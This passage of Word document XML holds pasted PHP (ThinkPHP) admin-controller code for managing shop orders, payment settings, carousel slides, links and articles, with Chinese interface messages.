      </w:r>
    </w:p>
    <w:p w14:paraId="16C4C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6BCF2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69B509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12B9C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6126E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B12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FDD95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2BB59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7220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D505D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F1F45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C39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3D98A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B1A0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dingdan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3868E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DBF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$name=input('name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235C9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3492C6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7DE182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if($type=='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F632A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$where['b'.$type]=['like','%'.$name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6102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9C7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$where['a'.$type]=$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B106D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356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F72C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173F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['__SHOPLIST__ b','a.shopid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE56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444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$data=Db::name('shoplist_records')-&gt;alias('a')-&gt;join($join)-&gt;field('a.id,a.shopid,a.data,a.uid,a.code,a.time,a.money,a.kuaidi,a.danhao,a.data,a.type,a.num,b.title,b.image')-&gt;order('a.time desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF50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103777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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE74C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566C2B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EC4D3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040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dingdancode(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC6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50C376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$name=Db::name('shoplist_records')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595D1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$shop=Db::name('shoplist')-&gt;find($name['shopid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80EB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$member=_user($name['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE05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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C4D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$this-&gt;assign('shop', $shop);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DBE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$this-&gt;assign('member', $member);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEBA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B4A8F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693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dingdanadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA34A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296C2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44852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58003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Db::name('shoplist_records')-&gt;update(['id'=&gt;$id,'data'=&gt;$post['data'],'kuaidi'=&gt;$post['kuaidi'],'danhao'=&gt;$post['danhao']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0102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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEA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0BCD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CAA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F507D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DF28B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6CEEC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1F1DD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57BC2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68470C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Pay extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C197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5D5D4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77511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$data=Db::name('pay')-&gt;order('des desc,id asc')-&gt;where("type!=''")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D682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1F0FA6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6829B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88BE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58051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$id=input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEB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$name=Db::name('pay')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AF6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$this-&gt;assign('name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F0E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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05A0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$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E998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'id'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78F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'title'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C6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'hide'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794011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'des'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC42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4D83C8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$validata=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD2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 (!$validate-&gt;check($validata)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36033D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['err'=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35576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ab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75710F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Db::name('pay')-&gt;update($validata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AC3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['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12B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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032C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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718EE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275D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E40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3D99A4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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D7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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32334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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DDC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$text=['0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F4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DFEDF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Db::name('pay')-&gt;where('id',$id)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA63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$data=[$text[$type]];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053F7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047F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$data=['GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FA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AB87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9859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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521E1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C35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4293F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785A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record(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3286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$data=Db::name('pay_record')-&gt;order('id desc')-&gt;paginate(50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A59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9092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3E807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0A88C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D1F08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9278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0234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485E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101B62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059F4C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B3850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Slide extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A8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44D4A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543A32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$data=Db::name('slide_type')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE5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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A50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59365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9DA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typeAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252505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185C9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21D37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25F59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59F646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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F10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54ABF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$titledb=Db::name('slide_type')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E59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5706A6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['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35351C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8128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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C4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$db=Db::name('slide_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6D6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38F74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1176F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C329C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5CAD62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2A13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7F063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$db=Db::name('slide_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33E9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E9698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5273F6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5BD17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02310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DED4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8CAB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7A86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1A48C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$name=Db::name('slide_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3A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408D7E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0F29CB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1727D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0491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3EA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668A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2CD3BB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BEC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160E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A69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typeDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D87B9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AD15D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7D08D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73EE7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$admin=Db::name('slide')-&gt;where('tid',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341B3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if(!$admin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A938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$db=Db::name('slide_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C77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2BA9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0C558A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A9E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3887D8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9897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EF5A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分组有轮播图，请先删除轮播图对应分组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F59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EA1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6273A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9EA4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C91C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04751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0B20E9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B8C1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$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE4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28CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE80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$tid=input('tid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637FD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$data=Db::name('slide')-&gt;where('tid',$tid)-&gt;order('des desc,id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC198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300DD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$this-&gt;fetch('list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF90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EC60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0D2DE4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4AAE1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A8B2A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7D8C2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$arra=['0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A23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$type='hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487037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$db=Db::name('slide')-&gt;where('id',$id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140416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if($db==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCC0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$hide=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1ED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3BA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$hide=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85F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E6A0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$db=Db::name('slide')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E986B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8676C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$data=['ret'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C384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1D117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$data=['err'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D47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6F1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34A3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265A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5F2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D487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$data=['err'=&gt;'AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA1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773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7EC91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8DBB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3D5C9A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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249DC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$this-&gt;assign('tid',input("tid"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467B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$slide_type=Db::name('slide_type')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BD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$this-&gt;assign('slide_type',$slide_type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28988B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F38EC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5E340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3A3A28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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A04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3AF298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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C47F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$db=Db::name('slide')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CF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84A71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4AF743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AE091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644208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45277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      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFA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$db=Db::name('slide')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484D1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6580A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4AA8E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BCA87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33BCD5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698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343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78AF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A4DD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$name=Db::name('slide')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172187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C697D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7608F3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0641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B3015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B11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1535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4B152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7CA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2D7D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B9A6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5630FE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096D8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260844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6456B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$db=db('slide')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042C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C249D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13BBF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CBA5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04DB42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A9A42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B05D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929AD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DFF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2579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2516D3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B945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9B891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C44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D514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1BBC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0B0D5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18F62E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37741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Link extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8F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58BD3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0031CB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$data=Db::name('link')-&gt;order('des desc,id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116833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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658268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6E562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085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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F680F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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D83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5451E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57C29D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601132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$db=Db::name('link')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2AD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D779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505EF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39F0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57CEC1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1F132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0D1DD2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$db=Db::name('link')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3B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BB66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2FD5AD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36D3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7F666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1450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61B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3560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627E8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$name=Db::name('link')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640893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381D6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5BBA0A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B345A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285B9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222D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446D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53C4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43C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329B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2FC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1F135A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495F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47309E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F4711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$db=db('article')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54718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3905C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74307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393B4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54900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57A1C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89A48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1E49E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A71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3880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2AAF8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B9BE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2CC95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D859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9C536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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7A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5088D4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2C4FBB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09D655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7E9581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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489854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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4F8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4EF0A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Article extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AC8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BA9D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5D090B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$mychannel=input('mychannel');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8E6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$map['mychannel']=$mychannel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3658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EA4C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$this-&gt;assign('mychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2493DE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$typeiddb=Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFA0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$this-&gt;assign('typeid',get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356A1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$search_name=input('param.search_name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7789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$search_typeid=input('param.search_typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED5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$typeid=input('param.typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05935F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$flags=input('param.flags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C89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$weitoutiao=input('param.weitoutiao');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA2F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$map['title|tags|description']=['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0A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972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if($search_typeid &amp;&amp; $typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C3D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$map['typeid']  = $search_typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD4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FF1C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if($search_typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB80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$map['typeid']  = $search_typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC3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E6BC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if($typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFE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$map['typeid']  = $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D52A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D09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7B6E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if($flags){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C552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$map['flags']=$flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39487E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1E26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if($weitoutiao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A57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$map['weitoutiao']=['in','1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE1A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ED1F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$map['hide']=['in','0,1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D739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$data=Db::name('article')-&gt;order('des desc,id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B54E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4E9C8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65048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7A1A5E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0B34C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9B8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3D925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$mychannel=input('mychannel');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE36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$mychannel=Db::name('mychannel')-&gt;where('id',$mychannel)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007908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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4D80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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55F0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F990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$this-&gt;assign('mychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A00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$flags=Db::name('flags')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723253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$this-&gt;assign('flags',$flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB438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$typeiddb=Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4D9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$this-&gt;assign('typeid',get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CB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16E341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74615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6B6CE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if(!$post['uid'] || $post['uid']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17D2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$post['uid']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FED6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7684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if($post['weitoutiao']=='1' &amp;&amp; input('mychannel')==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED534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$image=$post['images'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C03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if(!$image){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D550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请上传图片</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F11F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5B42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$image=json_decode($image,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11C5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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6B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$img[]=$v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF6D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3DC7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$post['images']=htmlspecialchars(json_encode($img));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E195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8E56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if($post['typeid']&lt;=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA25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D719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if($post['update_time']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF83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$time=strtotime($post['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964E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FB232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624DEC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6CA3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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBBAB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if($mychannel['id']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A06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if($mychannel['id']==3 || $mychannel['id']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B14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if(!$post['video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D9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视频地址必须填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC670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D843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if($mychannel['id']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9469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4ADF6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模型</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C689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9C89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if(!empty($post['content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6593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$post['content'] = htmlspecialchars_decode($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBA6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924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6CE2CF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$post['mychannel']=$mychannel['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E8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if($post['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E68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$titledb=Db::name('article')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D4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0F78E2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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
